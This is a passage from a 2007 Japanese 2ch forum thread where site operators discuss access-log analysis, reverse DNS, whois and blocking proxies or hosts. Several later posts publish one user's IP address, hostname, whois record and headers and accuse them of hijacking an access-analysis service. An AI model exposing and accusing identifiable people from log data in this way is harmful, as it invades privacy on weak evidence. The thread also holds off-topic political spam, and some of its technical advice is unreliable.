普通のレンタルサーバならアクセスログは採取可能。

812 :バッカーです ◆KeuXjwWDdE :2007/02/02(金) 20:23:31 ID:???
そもそもどういった理由でjpgやらcssのログが見たいのか知りたい。


813 :DNS未登録さん:2007/02/02(金) 20:43:44 ID:???
>>811
そしたらやっぱり、プロバイダーのホームページスペースはもうやめて、
レンタルサーバーにのりかえるべき時期が到来した、という判断ですかねー?

アクセスログを全部見たい、というだけであれば、わざわざ自宅サーバーに
する必要も無い?

ただ、
「おまえのコンテンツが気に入らないから削除しろ」
とかって言われることはないんでしょうか?

>>812
どっかのスレで、
「アクセスログを残したくないからグーグルのキャッシュでみて
javascriptもオフにしたんだけど、うっかりCSSを読み込んじゃって」

とかいう書き込みをみて、CSSのログも見れれば誰が見にきているか
正確にわかるとおもって。

814 :DNS未登録さん:2007/02/02(金) 21:09:12 ID:???
だったらレンタル鯖だろうな。さくらとか。
普通の有料Webスペースだとログ見れないことがあるので、あくまで共有レンタル鯖を
借りるべし。

>「おまえのコンテンツが気に入らないから削除しろ」
>とかって言われることはないんでしょうか?
よほどヤバくない限りは関係ない。というか、プロバイダのスペースで運用できてる
レベルなら関係ないと思うぞ。よほどアホな会社を選ばない限りは。
最近は淘汰が進んできたとはいえ、安さをウリにしてるレン鯖会社は基本的に新興の
中小零細企業が多い。
だから下手なとこ借りると個人情報流出したり、いきなり何日も鯖が落ちたり、夜逃げ
されたり、客を客と思ってないバカ管理人に腹立てるハメにるので、申し込む前に
念入りに下調べをしましょう(笑)。
http://pc10.2ch.net/hosting/
レン鯖板に色々スレがあるからそこ見れ。
まぁ一定数のアクセス数稼げるようになると、誰が見に来てるかなんてどうでもよくなる
よ、実際。荒らされてるときとかは便利だけど。

815 :DNS未登録さん:2007/02/02(金) 22:45:15 ID:6YUfmmhz

まだ素人でよく分からないんですけどlinuxで自宅サーバを立ち上げたら
どれぐらい外部から攻撃されるのですか?されませんか?


816 :DNS未登録さん:2007/02/03(土) 00:49:28 ID:???
>>815
されないので安心してたてていいお(^ε^)

817 :DNS未登録さん:2007/02/03(土) 08:51:02 ID:???
>>815
それはOSによらない。

Linux/BSDが安全と言われるのは、あくまで「正しく設定出来ていれば」と
いう前提がある。Win*は正しく設定することが大変難しいから、危ないと
言われる訳だ。

Win*に比べて頻度は少ないとは思うが、Linux/BSD自身、あるいはその上で
動いているapache, PHPなどの脆弱性をついてくる香具師は結構いる。
実際に漏れが設定ミスでsshのパスワード認証をONにしていたら、1ヶ月以上
も辞書攻撃(?プルートフォースかも)かけてきた香具師が居たよ。アクセス
してきたユーザ名がrootだのdaemonだのUNIX特有のユーザ名だったので、
どうやらUNIXである事を確認した上で攻撃してきたようだ。
#そういう攻撃が通じないように、パスワード認証を禁止して公開鍵のみ
 にしてあったんだよ。sshのバージョンアップでUsePAMという設定が出来て、
 しかもdefault ONな物だから...


818 :DNS未登録さん:2007/02/03(土) 17:37:24 ID:dw2Kna7O
>>817,816
ありがとうございました
検討します

819 :DNS未登録さん:2007/02/09(金) 00:58:48 ID:???
DoSアタック食らうと堪えるねぇ。

820 :DNS未登録さん:2007/02/09(金) 12:57:14 ID:???
>>819
2ちゃんが使ってるF5バーボンと
同じ仕組みは導入するのは難しい?

821 :DNS未登録さん:2007/02/15(木) 23:36:02 ID:???
SYN FloodなのでF5アタックのようなアクセス集中ではないんです。
サーバ自体にSYN Cookieは導入したけど、ルータがあくまでも家庭用のものなのであまりにも酷いと耐え切れない。

サーバにルータ自体もやらせるか、PCルータにすることも検討中だけどね。


822 :DNS未登録さん:2007/02/19(月) 16:49:02 ID:+yceos6W
webdruidのサイトがなくなってるんだが、どっかからダウンロードできない?

823 :DNS未登録さん:2007/02/27(火) 13:38:16 ID:???
Webalizerを使っているんですが、Total Referrersの1位に、ただの文字列で「Yahoo!」とだけ表示されています。
それも、あり得ないくらい多い数値のHitsで記録されているのですが、それらしきアクセスログも見あたりません。

調べてみると、そのYahoo!経由のHitsは、Webazlierが検知した月間のTotal Hitsと同じ数値(これも多すぎる)でした。
これはWebalizerがハックされているのでしょうか?それとも、Yahoo!の正体をログから探れるでしょうか?

ちなみにbbtec.net、Yahooのクロールからのアクセスは微々たるもので桁が違いすぎます・・。

824 :DNS未登録さん:2007/02/27(火) 15:12:00 ID:???
webalizer.confの
GroupReferrer yahoo.com/ Yahoo!
という所からの調査はした?

825 :823:2007/02/28(水) 10:41:47 ID:???
>>824さん
なるほど!Group Referrerという設定があったんですね。
これを足がかりに調査してみたいと思います。ありがとうございました!

826 :DNS未登録さん:2007/03/01(木) 13:25:11 ID:g+haIAOi
とあるクライアントなのだが、その人がアクセスすると
2つのIPが同じドキュメントをGETするようになっている

まずはTRENDMICRO 社のIPが指定のドキュメントをGETして、
続いて本人(と思われる)IPがGETしている

これはセキュリティー上からそういうアクセスをしているのか
あるいはスパイウェアに感染しているのか

827 :DNS未登録さん:2007/03/01(木) 14:43:32 ID:???
>826
そのクライアントはTRENDMICRO社に勤めている訳ではないんだな?

確かにその動作はTRENDMICRO社のサーバが先にGETして、ウィルス
などをチェックしてからユーザのアクセスを許可しているように
見えるね。

多分これじゃないかねぇ。
ttp://www.trendmicro.com/jp/products/gateway/iswm/evaluate/overview.htm

828 :DNS未登録さん:2007/03/01(木) 21:44:46 ID:???
クライアントだあ? つーことは、>>826は技術者か?
「2つのIP」とか「TRENDMICRO 社のIPが」とか
「本人(と思われる)IP」とか・・・
きさまはCPUクーラーをCPUと呼ぶのか?

829 :DNS未登録さん:2007/03/01(木) 22:14:09 ID:???
つまり>>828
・「2つのIP」
・「TRENDMICRO 社のIPが」
・「本人(と思われる)IP」
等を
・「2つのIPスタック」
・「TrendMicro社のIP実装」
・「本人と思われるインターネットプロトコル」
などと解釈しちゃいそうで紛らわしく思うんだ?

まぁ文脈無視していきなり「2つのIP」って出てきたら紛らわしいかもね★

830 :826:2007/03/01(木) 23:34:59 ID:???
>>827
ありがとう、多分それだね
でも毎回2回ずつGETされるのはやだなー

831 :DNS未登録さん:2007/03/01(木) 23:52:40 ID:???
じゃ、クライアント様に言えばいいじゃん。やだからやめろ、って。

832 :DNS未登録さん:2007/03/02(金) 00:47:00 ID:???
>>827
BBSなどが全部2重カキコになる非常にうっとぉしいサービスなのだ

833 :DNS未登録さん:2007/03/04(日) 20:41:32 ID:???
>>830
トレンドマイクロのIPアドレス、もしくはUserAgentが違うならUserAgentを弾けばいいんじゃないの?
そのユーザ自体もアクセスできなくなるかもしれないが知ったことじゃないw


834 :DNS未登録さん:2007/03/05(月) 12:19:34 ID:???
Webalizerを使っているのですがCountriesが全部Unresolved/Unknownなってしまいます。
ディストリはDebian3.1 Stableでapt-get install webalizerでインストールした物です。
詳しくは分かりませんがcountry-codes.txtというファイルが見当たらないのが問題でしょうか?
何かしらアドバイスをいただければ光栄でございます。
よろしくお願いします。

835 :DNS未登録さん:2007/03/05(月) 12:27:16 ID:???
>>834
httpd.confでHostnameLookupを設定してみたらどう?

836 :DNS未登録さん:2007/03/05(月) 12:40:25 ID:???
>>835
すみませんありがとうございます。
無知で何も知りませんでした。
無事に表示できるようになりました。

ありがとうございました。

837 :DNS未登録さん:2007/03/05(月) 17:59:59 ID:???
>>835
それだと全リクエストにLookupの手間がかかるから、logresolveかけたほうがよくね?
IPアドレスを必ずログの先頭に書き込まないといけないって制限ができるけど。

838 :DNS未登録さん:2007/03/07(水) 22:07:31 ID:???
サーバの負荷&利用方法にもよるんじゃない

839 :DNS未登録さん:2007/03/09(金) 06:05:57 ID:???
あるIPアドレスからアクセス要求があったときに、
逆引きできるかどうか調べて、
もし逆引きできなかったら、
自動で.htaccesssに追加して
アク禁するにはどうしたらいいかな?

840 :DNS未登録さん:2007/03/09(金) 06:45:14 ID:???
Apacheの話ならHostnameLookupをOnにしてSetEnvIfでREMOTE_HOSTに
値が入ってないアドレスを蹴ればいい。

841 :DNS未登録さん:2007/03/09(金) 08:01:36 ID:???
>>840
ありがとう。

いままで20箇所くらいで聞いて
誰一人として答えられなかった問題でした。

842 :DNS未登録さん:2007/03/09(金) 08:08:52 ID:???
>>841
一応いっとくけど、それは割と過激な部類の制限だからね。
もし海外からのアクセスを蹴りたいとかなら別の方法を検討した方がいいよ。

843 :DNS未登録さん:2007/03/09(金) 11:02:19 ID:???
>>842
えっ、どういう意味ですか?
海外とかの意図ではないです

国籍によって人を差別するのは
憲法違反ですよね。

844 :DNS未登録さん:2007/03/09(金) 11:41:57 ID:???
>>843
いや単に、どういう目的のために「逆引きできなかったらアク禁」をしたいのか
想像がつかないだけ。

逆引きできないホストは招かざる客だって確定してるとか、
「逆引きできなかったらアク禁」自体が目的なんだったら、別にいいんだけど。

845 :DNS未登録さん:2007/03/09(金) 11:54:23 ID:???
逆引きできないと、
どこの誰だかわかりませんよね。

同様の理由で、WEBサーバーが
動いてなかったら自動的にアク禁とかも
やりたいです。

技術的に可能かどうか知りませんけど。

846 :DNS未登録さん:2007/03/09(金) 12:26:46 ID:???
>逆引きできないと、
>どこの誰だかわかりませんよね。

whois して割り当て元を見てください。逆引きはアテになりません。

847 :DNS未登録さん:2007/03/10(土) 04:33:26 ID:???
>>846
2重逆引きすれば確実ですよね

848 :DNS未登録さん:2007/03/10(土) 10:51:36 ID:???
>847
何を確実にしたいのかがわからん。

普通は何か被害を与えられた時に、荒らしが使っているアドレスで
アクセスしてくる相手が誰かを確実に知りたいのではないかな?
それならwhois使って出てきたISP等に連絡して被害を申告して対処
を依頼する。

逆引きできるかどうか、逆引きで嘘ついているかどうかは相手が
どこにいるかという判断には何の意味もない。一部プロバイダでは
逆引き名で地域がわかるという所もあるが、それ以外のプロバイダ
ではわからない。


849 :DNS未登録さん:2007/03/10(土) 12:11:13 ID:???
>国籍によって人を差別するのは憲法違反ですよね。

ほう。あんた、政府機関か地方自治体のシステムの面倒みてるのか。
個人が憲法に違反することなんてあり得ないしね。

850 :DNS未登録さん:2007/03/10(土) 12:28:20 ID:???
そもそも日本国憲法には国籍による差別を禁じるなんてどこにも書いてないし、
アクセス禁止が「差別」になるかどうかも怪しいし。

851 :DNS未登録さん:2007/03/10(土) 13:45:34 ID:???
>>848
どこの誰かっていうのは
所属組織のことをイメージしてます。

852 :DNS未登録さん:2007/03/10(土) 14:18:10 ID:???
>>851
逆引きできないIPアドレスは怪しい、そんな所からアクセスしてくる人は怪しい人。
そういうことにしたいんでしょ? じゃあそういうポリシーで規制しなよ。
方法ももう回答もらってるんだし。
あなたが運用するサーバなんだから誰も文句いわないよ。

それ以上の回答が欲しいなら、本当は何がしたいのかちゃんと書くこと。
さもないと延々とこの調子で話が進展しないよ。

853 :DNS未登録さん:2007/03/10(土) 14:24:39 ID:???
>>852
いやもうまったくその通りですよ

854 :DNS未登録さん:2007/03/11(日) 00:15:08 ID:???
>同様の理由で、WEBサーバーが
>動いてなかったら自動的にアク禁とかも
>やりたいです。

これもムチャクチャな考えだよな。
Webサーバが動いている方が珍しいぞ。

855 :DNS未登録さん:2007/03/11(日) 09:21:28 ID:???
プロキシ経由の
アクセスだったら、自動的にアク禁、って
やりたいんだけど、どうやればいい?

ひろゆきがやってるのはBBQなの?
BBQのリスト(オープンプロキシのリスト)を
コツコツ作らないとだめなの?

それとも、アクセスがあった場合、そのパソコンを
オープンプロキシとして試しに使おうとしてみて、
使えてしまったらそれはオープンプロキシとして認定して
自動的にアク禁、とかってできるの?

856 :DNS未登録さん:2007/03/11(日) 09:46:32 ID:???
アクセスを一つ一つ調べる。
環境変数でHTTP_VIAとかってのがあれば大概proxyだったり、
アクセス元のTCP80をスキャンしてみたり。
やり方は色々


857 :DNS未登録さん:2007/03/11(日) 09:55:22 ID:???
http://piece.s201.xrea.com/p/rank.cgi?mode=rank_rui&kt=06_02

ここにいろいろかいてあるんだけど、
どうも設置方法がよくわからんな。


http://homepage2.nifty.com/intel-404/internet/bbs/protect.html
ここに書いてあるのでも、

ほとんどの荒らしが身元を隠すためProxyを使用しているため、
全てのProxyによる投稿を拒否します。方法は多くあるのですが
掲示板のソースに直接書き込んで弾く場合は以下なような
コードを入力します。

$check = 0;
$check = 1 if($ENV{'HTTP_VIA'});
$check = 1 if($ENV{'HTTP_X_FORWARDED_FOR'});
$check = 1 if($ENV{'HTTP_FORWARDED'});
if($check ==1)

意味がよくわからんし。
どこに入れていいのかもわからんし。はぁ。

858 :DNS未登録さん:2007/03/11(日) 11:11:41 ID:???
中学生は知らないかもしれないが、企業や大学、自治体などの
大きな組織はプロキシを導入していることが多い。
ケーブルテレビの中にもそういうところはある。
だから、HTTP_VIA などの環境変数がセットされていたら
必ず拒否する、というのは無謀。

859 :DNS未登録さん:2007/03/11(日) 12:23:07 ID:???
オープンプロキシーからのアクセスだったら拒否したいと申し上げております

860 :DNS未登録さん:2007/03/11(日) 12:23:52 ID:???
ちなみに中学生は知らないかもしりませんが
オープンプロキシーというのは誰でも
プロキシーとして使えてアクセスできるものをいいます。

861 :DNS未登録さん:2007/03/11(日) 12:39:50 ID:???
>>840
「弊社サーバでは負荷軽減の為、
HostnameLookupはOffの状態とさせていた
だいております。」

って言われてしまいました。
この場合、どうすればいいですか?

862 :DNS未登録さん:2007/03/11(日) 12:47:03 ID:???
いや、だから、逆引きできなければ拒否っていうバカげたポリシーを放棄すりゃ済む話だろ?

863 :DNS未登録さん:2007/03/11(日) 13:12:23 ID:???
逆引きできないとアクセスログみたときに
数字の羅列だけならんでいて、どこの誰だか
わかりませんよね?

まあwhoisすればわかるという意見もあるかも知れませんが
自動的にwhoisするツールでもあるのであればともかく、
こっちがいちいちIPアドレスをコピペしてwhoisするなんて
アホなことしたくないんですよ。

だいたい悪いことするやつに限って逆引きできないIPで
押しかけてくる印象がありますしね。

なので
「HostnameLookupはOffの状態」
という条件下で、逆引きできないIPを
ブロックする方法を教えてください。

864 :DNS未登録さん:2007/03/11(日) 13:13:39 ID:???
あるいは
HostnameLookupがON
な、料金安めなレンタルサーバーを
教えてくれるというのでもいいですよ。

865 :DNS未登録さん:2007/03/11(日) 13:24:33 ID:???
>>862
まあ確かに逆引きできないIPをブロックするというのは
問題があるポリシーかもしれませんね

たとえばいまアクセスログを見ていて、

210.232.24.196

という、逆引きできないIPがあったので、あやしいので
問答無用でアク禁リストに放り込みましたが、
念のためあなたの言う、Whoisをしてみたところ、
角川書店に割り当てられたIPであることがわかりました。

なぜ逆引きできないのかはなぞですが、
逆引きできないという理由でアク禁してしまうと
別に問題のない訪問客までもアク禁にしてしまう
リスクがあると認識しました。

866 :DNS未登録さん:2007/03/11(日) 13:26:07 ID:???
とはいえ、スパマーとか、掲示板荒らしとか、
悪いことをする人間に限って、なぜか
逆引きできないIPで押しかけてくる傾向がある
のも事実ですよ。

おそらく少しでも身元を隠したいという気持ちが
働くのだろうと思いますが。

867 :DNS未登録さん:2007/03/11(日) 13:38:39 ID:???
逆引きできない怪しいやつなんだから、角川書店を騙ってるに決まってる。
即アク禁で当然。

868 :DNS未登録さん:2007/03/11(日) 13:40:31 ID:???
whoisの情報には信頼性が無いと?

869 :DNS未登録さん:2007/03/11(日) 14:15:05 ID:???
robots.txtの書き方おしえて。
あらゆるロボットを排除したいんだけど。
改行コードはLFでないとだめなのかな?
あとどのスレで聞けばいいのかもおしえて。
あとどこのディレクトリにつっこめばいいのかも。

870 :DNS未登録さん:2007/03/11(日) 14:16:29 ID:???
オープンプロキシ排除できればかなりよくなるよなー
どうやればいいのかなー

871 :DNS未登録さん:2007/03/11(日) 14:59:30 ID:???
>>864
>教えてくれるというのでもいいですよ。

ずいぶん偉そうな物言いだな。それぐらい自分で探せやボケが。

872 :DNS未登録さん:2007/03/11(日) 15:00:51 ID:???
相手は逆引きできないような怪しいやつですよ。
whois情報の改竄くらいやりかねません。

873 :DNS未登録さん:2007/03/11(日) 17:32:17 ID:???
whois情報の改竄ねぇ....
DomainNameなら不可能ではないが、アドレスの情報を改竄するには
どこのサーバをクラックする必要があるのか、考えてみたことはあるのかな?


874 :DNS未登録さん:2007/03/11(日) 17:46:26 ID:???
逆引きできないイコール怪しい奴と単純に考えることの
バカバカしさを分からせるため or 揶揄するために
わざとボケてるんだよ。>>867>>872 はさ。

875 :DNS未登録さん:2007/03/12(月) 02:54:43 ID:???
オープンプロキシ排除できたらマジでいいよね。
やりかたわからんけど。

876 :DNS未登録さん:2007/03/13(火) 22:05:48 ID:???
203.128.163.226
からの荒らしがあった。
逆引きはできてないから、
逆引きできないIPなのだろう。
whoisをしたら、韓国のIPのようだ。
この場合、*.kr をアク禁にしたら、
203.128.163.226もアク禁にできるのだろうか?
あるいは、逆引きできないから、アク禁できないのであろうか?
その場合、数字で範囲を指定して、アク禁にするのだろうか?

877 :DNS未登録さん:2007/03/13(火) 22:06:36 ID:???
そしてさらに推測するが、この
203.128.163.226
というのは、オープンプロキシでないだろうか?
それをどうやったら確認できるだろうか?

878 :DNS未登録さん:2007/03/13(火) 22:30:14 ID:???
dish-sg.nttdocomo.co.jp

ここからアクセスがあったんだが、
これって携帯のユーザーのアクセス?
それとも、ドコモの会社からのアクセス?
ユーザーからだったら、docomo.ne.jpになると
思うんですけど。

879 :DNS未登録さん:2007/03/13(火) 22:37:21 ID:???
203.104.97.101

また逆引きできないIPからのアクセスがあったので
whoisしてみたら、

netname: DATAHOTEL
descr: Livedoor Co., Ltd.
descr: DataHotel TaskForce
country: JP   → (日本)

これはどう判断したらいいのだろうか?
データホテルの従業員が見にきたのか?
それとも、
CGIやプロキシ的な使い方か、アンテナとか、
スクリプトやボットなのだろうか?

880 :DNS未登録さん:2007/03/13(火) 22:44:27 ID:???
202.33.90.76

また逆引きできないIPがでてきたのでwhoisしてみた。

結果:新日鉄ソリューションズ株式会社
シロ。

いちいちwhoisするのメンドイから、
逆引きできるようにしていただけないか?

881 :DNS未登録さん:2007/03/13(火) 22:49:25 ID:???
>>878
これについて自己レスなんだが、
もし携帯ユーザーのアクセスだったら

proxy170.docomo.ne.jp

こんな風になるはずなんだよな。

882 :DNS未登録さん:2007/03/13(火) 23:08:59 ID:???
eclcache4.m.ecl.ntt.co.jp

これって、NTTのISPを使用している
一般ユーザーのアクセスなのかな?

それとも、みかかの社員が見に来た?

どっち??

883 :DNS未登録さん:2007/03/14(水) 00:52:12 ID:???
in-out-f136.google.com

これはなにしにきたんだ?

884 :DNS未登録さん:2007/03/14(水) 01:15:33 ID:???
質問

wbcc1s03.ezweb.ne.jp

これをアク禁したくて

b.ne.jp

をアク禁リストに入れたんだが、
どうもログを見ると200になってるようなんだ
なぜかな?
ちゃんと
.ezweb.ne.jp
って書かないとだめなの?

885 :DNS未登録さん:2007/03/14(水) 07:17:15 ID:???
逆引き&whoisネタの奴はトリップかコテ付けてくれ。その方が回答者としても
能率的に回答できる(したい人が居れば)。そうすれば系統だった個別
対応ができる。今みたいに五月雨式に書かれちゃ対応する気も失せる。


886 :DNS未登録さん:2007/03/14(水) 10:17:01 ID:???
>>876-884
deny from all

887 :DNS未登録さん:2007/03/15(木) 03:28:19 ID:???
>(したい人が居れば)

いないんじゃないかな

888 :DNS未登録さん:2007/03/16(金) 18:56:23 ID:cRYJpSoQ
smtp.pixela.co.jpってなんですか?

889 :DNS未登録さん:2007/03/16(金) 19:17:19 ID:???
株式会社ピクセラの送信メールサーバー

890 :DNS未登録さん:2007/03/16(金) 19:25:07 ID:???
cs-tor.bu.edu

ってアクセスログがあって、

「イギリスのボストン大学かー」
と思ったけど、ん?tor??と思って
WEBブラウザーでアクセスしてみたら、
TORのノードみたい。

2ちゃんが使ってるTORブロックのシステム
導入したい。すべてのTORノードのIPが
リストされてるという、あれ。

891 :DNS未登録さん:2007/03/16(金) 19:44:54 ID:???
最近ボストンは英国に移動したのか。知らなかったぞ。

892 :DNS未登録さん:2007/03/16(金) 19:53:31 ID:???
ごめん、
アメリカのマサチューセッツ州だった

893 :DNS未登録さん:2007/04/03(火) 20:05:57 ID:0Il74kur
マルチ投稿でスマソ  Morfeus Fucking Scanner は何しに来てるの?情報求む!

894 :DNS未登録さん:2007/04/04(水) 01:36:25 ID:QB/MbhHh
マルチなら失せろ

895 :DNS未登録さん:2007/04/04(水) 03:47:54 ID:???
サイトのパスワードとか調べてくれませんか?

896 :バッカーです ◆KeuXjwWDdE :2007/04/04(水) 04:01:53 ID:???
その前にスレタイ読んでください

897 :DNS未登録さん:2007/04/04(水) 04:12:06 ID:???
すいません初心者なもんで。どこのスレ行けばいいか教えて下さい

898 :DNS未登録さん:2007/04/04(水) 04:17:06 ID:???
>>869
>あらゆるロボットを排除したいんだけど。
むり。そういうロボットに限ってrobots.txtを読みに行かないから

899 :DNS未登録さん:2007/04/04(水) 09:53:06 ID:???
>>898
> むり。そういうロボットに限ってrobots.txtを読みに行かないから
robots.txtを逆に解釈する場合とかもあるかもねw
nofollowにしてるのにくろーりんぐしちゃうとか。

900 :DNS未登録さん:2007/04/13(金) 06:38:42 ID:/BPog3Kk
サーバーの勉強を始めて間もない初心者です。
環境:CentOS4.0/php+mysql(apache使用)

教えていただきたいのですが、
一日の間で、特定のユーザーがアクセスしたページ(ファイル)やアクセス頻度を
集計(あるいはグラフなどで表示)できたりする
アクセスログ解析ツールってありますか?

901 :DNS未登録さん:2007/04/13(金) 10:19:58 ID:???
>>900
apacheにアクセスしたユーザでいいのかな?
「特定のユーザ」ってのを特定する方法をまず考えないといかんのでは。

902 :DNS未登録さん:2007/04/13(金) 13:05:01 ID:???
>>900-901
ログ読めばよいんでね?
IPアドレス特定できるならgrepで利用者抽出、
あとはwc -lとかを組み合わせればおk。

903 :DNS未登録さん:2007/04/13(金) 17:27:22 ID:/BPog3Kk
>>901-902
レスありがとうございます。説明不足でした。

「ユーザー(利用者)」のIPアドレスは
非固定(固定も含む)のものです。
調べたところ、「Awstats」というものがよさそうなんですが・・・。
「sage」

904 :DNS未登録さん:2007/04/13(金) 17:41:15 ID:???
おいらも便乗して聞きたい。
Awstatsのデフォルトだと、ホスト一覧とURLページ一覧はそれぞれ見れるが、
>>900のいうようにホスト一覧にあるアドレスがどのページにアクセスしたか見れない。
設定したら見れる?

今は必要に応じてログを見てるけど、面倒なんです。

905 :DNS未登録さん:2007/04/13(金) 17:41:53 ID:???
>>903
その「ユーザー」って、何らかの認証(ログインとか)をしてるわけ?
ApacheならBasic認証をしたユーザ名をログに残せるけど。

906 :バッカーです ◆KeuXjwWDdE :2007/04/14(土) 23:19:42 ID:???
>>903
どうやってユニーク情報を引き出すの?

907 :DNS未登録さん:2007/04/15(日) 13:52:20 ID:???
だからぁ、ユニーク情報を引き出すにはどうしたらいいの、ってのが質問なんだろ?

908 :DNS未登録さん:2007/04/15(日) 14:40:10 ID:???
アホかと

909 :DNS未登録さん:2007/04/17(火) 00:15:56 ID:923VRfiJ
アクセス解析乗っ取り犯のサイトとPCの個体情報及びヘッダ!
http://m-pe.tv/u/page.php?uid=gajmgapg&id=1 ホストの情報
初回アクセス 4/16(月) 00:09:37
ホスト p125028008232.ppp.prin.ne.jp
IPアドレス 125.28.8.232
プロバイダ 不明
地域 日本
都道府県 不明
OS 不明
ブラウザ 不明
解像度 不明/ビット数(色の深さ):24
ホスト名の追跡結果


910 :DNS未登録さん:2007/04/17(火) 00:17:01 ID:923VRfiJ
続き!"125.28.8.232"のWHOIS結果[whois.arin.net]
[Querying whois.arin.net]
[Redirected to whois.apnic.net]
[Querying whois.apnic.net]
[whois.apnic.net]
% [whois.apnic.net node-2]
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html

inetnum: 125.28.0.0 - 125.29.255.255
netname: KDDI
descr: KDDI CORPORATION
descr: 2-3-2,Nishishinjuku,Shinjuku-ku,Tokyo
country: JP
admin-c: JNIC1-AP
tech-c: JNIC1-AP
status: ALLOCATED PORTABLE
remarks: Email address for spam or abuse complaints : abuse@dion.ne.jp
mnt-by: MAINT-JPNIC
mnt-lower: MAINT-JPNIC
changed: hm-changed@apnic.net 20050810
source: APNIC

role: Japan Network Information Center
address: Kokusai-Kougyou-Kanda Bldg 6F, 2-3-4 Uchi-Kanda
address: Chiyoda-ku, Tokyo 101-0047, Japan
country: JP
phone: +81-3-5297-2311
fax-no: +81-3-5297-2312
e-mail: hostmaster@nic.ad.jp
admin-c: JI13-AP
tech-c: JE53-AP
nic-hdl: JNIC1-AP
mnt-by: MAINT-JPNIC
changed: hm-changed@apnic.net 20041222
changed: hm-changed@apnic.net 20050324
changed: ip-apnic@nic.ad.jp 20051027
source: APNIC

inetnum: 125.28.8.0 - 125.28.8.255
netname: DP-PACKET2
descr: WILLCOM,Inc.
country: JP
admin-c: YK4542JP
tech-c: YO3757JP
remarks: This information has been partially mirrored by APNIC from
remarks: JPNIC. To obtain more specific information, please use the
remarks: JPNIC WHOIS Gateway at
remarks: http://www.nic.ad.jp/en/db/whois/en-gateway.html or
remarks: whois.nic.ad.jp for WHOIS client. (The WHOIS client
remarks: defaults to Japanese output, use the /e switch for English
remarks: output)
changed: apnic-ftp@nic.ad.jp 20050922
changed: apnic-ftp@nic.ad.jp 20050930
source: JPNIC


911 :DNS未登録さん:2007/04/17(火) 12:24:29 ID:???
意味が分からん

912 :DNS未登録さん:2007/04/17(火) 14:12:09 ID:YjNP4Ybi
2007/04/16 0:09:23
ページページ001
ページ回数1 サイト回数1 前回? 初回?
モニタ240 x 320 x 24bit JavaScriptTrue CookieTrue
HTTP_REFERER不詳(ブックマーク等)
HTTP_USER_AGENTMozilla/4.0 (compatible; MSIE 6.0;
KYOCERA/AH-K3001V/1.8.3.72.000000/0.1) Opera 7.0 [ja]
国/言語?
REMOTE_HOSTp125028008232.ppp.prin.ne.jp
Proxy情報△
Proxy関連情報
CACHE-CONTROL:max-age=43200


913 :DNS未登録さん:2007/04/17(火) 15:15:48 ID:???
9条は改憲してはならない。日本の為にならない。
日本人ではない朝鮮総連や民団でさえ、日本を心配して改憲への反対運動を行ってくれている。
私は日本人だが、「改憲すべき」などという者は、日本人として彼らに恥ずかしいと思います。

Q.中国から身を守る為、戦争に対する抑止力が必要では?
A.前提から間違っています。そもそも、中国は日本に派兵しようと思えばいつでもできました。
  なぜなら、日本には9条があるため、空母や長距離ミサイル等「他国を攻撃する手段」がない。
  つまり日本に戦争を仕掛けても、本国の、命令をだした幹部の命は絶対に安全なのです。
  「安心して戦争を仕掛けられる国」を、中国は、今まで攻めずにいてくれたのです。

Q.それは日米安保によるものでは? そして、その日米安保も絶対ではないのでは?
A.中国の良心を信じられないのはなぜですか? そして、日米安保は絶対です。
  知り合いの韓国人の評論家も「絶対だ」と言っていますし、私も同じ考えです。
  更に、9条が消えても米国の戦争に協力する義務は発生しませんが、米国が被害者の場合は別です。
  米国は日本を守る為に戦っても、(9条があれば)日本は米国を守る為に戦う必要がないのです。

Q.9条が本当に「平和」憲法なら、世界中で(日本以外に)1国も持とうとしないのはなぜか?
A.これは、日本以外のすべての国が誤っているとも言えます。
  「敵国に攻撃が届く国は攻められづらい」というのは、誤った負の考え方です。
  (もっとも韓国や中国の軍に関しては、日本の右傾化阻止の為でもあるので例外ですが)
  更に日本の場合、隣国が韓国・中国・ロシアと、GDP上位の安定した信頼できる国ばかりです。

Q.「9条改憲派」は「戦争反対派」。侵略者に戦争を挑発する、戦争憲法(9条)を撤廃したいのです。
A.それは、貧しい考え方ではないでしょうか?    
  中国や北朝鮮を信じる「強さ」があれば、そんな考えにはならないはずです。
  日本が信じれば、彼らも信じるでしょう。そして、真に美しい関係が始まるのです。

914 :DNS未登録さん:2007/04/17(火) 16:25:04 ID:YjNP4Ybi
それが、アクセスログと何か関係有ります?

915 :DNS未登録さん:2007/04/17(火) 16:54:03 ID:YjNP4Ybi
メッセージヘッダの続き!
inetnum: 125.28.8.0 - 125.28.8.255
netname: DP-PACKET2
descr: WILLCOM,Inc.
country: JP
admin-c: YK4542JP
tech-c: YO3757JP
remarks: This information has been partially mirrored by APNIC from
remarks: JPNIC. To obtain more specific information, please use the
remarks: JPNIC WHOIS Gateway at
remarks: http://www.nic.ad.jp/en/db/whois/en-gateway.html or
remarks: whois.nic.ad.jp for WHOIS client. (The WHOIS client
remarks: defaults to Japanese output, use the /e switch for English
remarks: output)
changed: apnic-ftp@nic.ad.jp 20050922
changed: apnic-ftp@nic.ad.jp 20050930
source: JPNIC


916 :DNS未登録さん:2007/04/17(火) 17:30:50 ID:???
それがアクセスログの解析の何関係があります?

917 :DNS未登録さん:2007/04/17(火) 18:37:06 ID:???
WILLCOMのPHSからつないでるのは分かった

918 :DNS未登録さん:2007/04/17(火) 21:25:19 ID:YjNP4Ybi
正確にはPHS回線でパソコンからのアクセスで、京セラソフトでOpera7ブラウザ使ってアクセスしたデータだね。

AIR-H使ってウィルコムのprinプロバイダー使ってる割りにアクセス解析不明は怪しいの分かるかな?


919 :DNS未登録さん:2007/04/17(火) 22:39:12 ID:???
>>918の日本語がわからんのかもしれん。

UAを信じるとPCだとは思えないけどどーでもいいや。

920 :DNS未登録さん:2007/04/17(火) 22:55:18 ID:???
>〜る割りにアクセス解析不明は怪しいの分かるかな?

prinだと認識しないのはキミが使っている解析ソフトがタコなだけ。
それに都道府県なんて分かる方が珍しい。

加えて、一般プロバイダのwhois情報など何の意味もないぞ。

921 :DNS未登録さん:2007/04/17(火) 23:32:31 ID:9QIypaM5
解析ソフトの問題じゃないな!
およそprinで端末情報出ない方が不自然で、UAも、mozilla4,0ベースのブラウザで且つ、IE6.0経由でOpera7ブラウザソフトであると表示してる。
つまり、PCである事の証拠だよ!
大体、どんなヘボィアクセス解析でもPrin殆ど解析に出るよ!
可笑しいと思わないのか?


922 :DNS未登録さん:2007/04/17(火) 23:35:06 ID:???
つーか、おまえ汚い日本語をどうにかしろ。
非常に不愉快だ。


923 :DNS未登録さん:2007/04/17(火) 23:36:56 ID:???
分かったこと
★日本語が不自由だということ
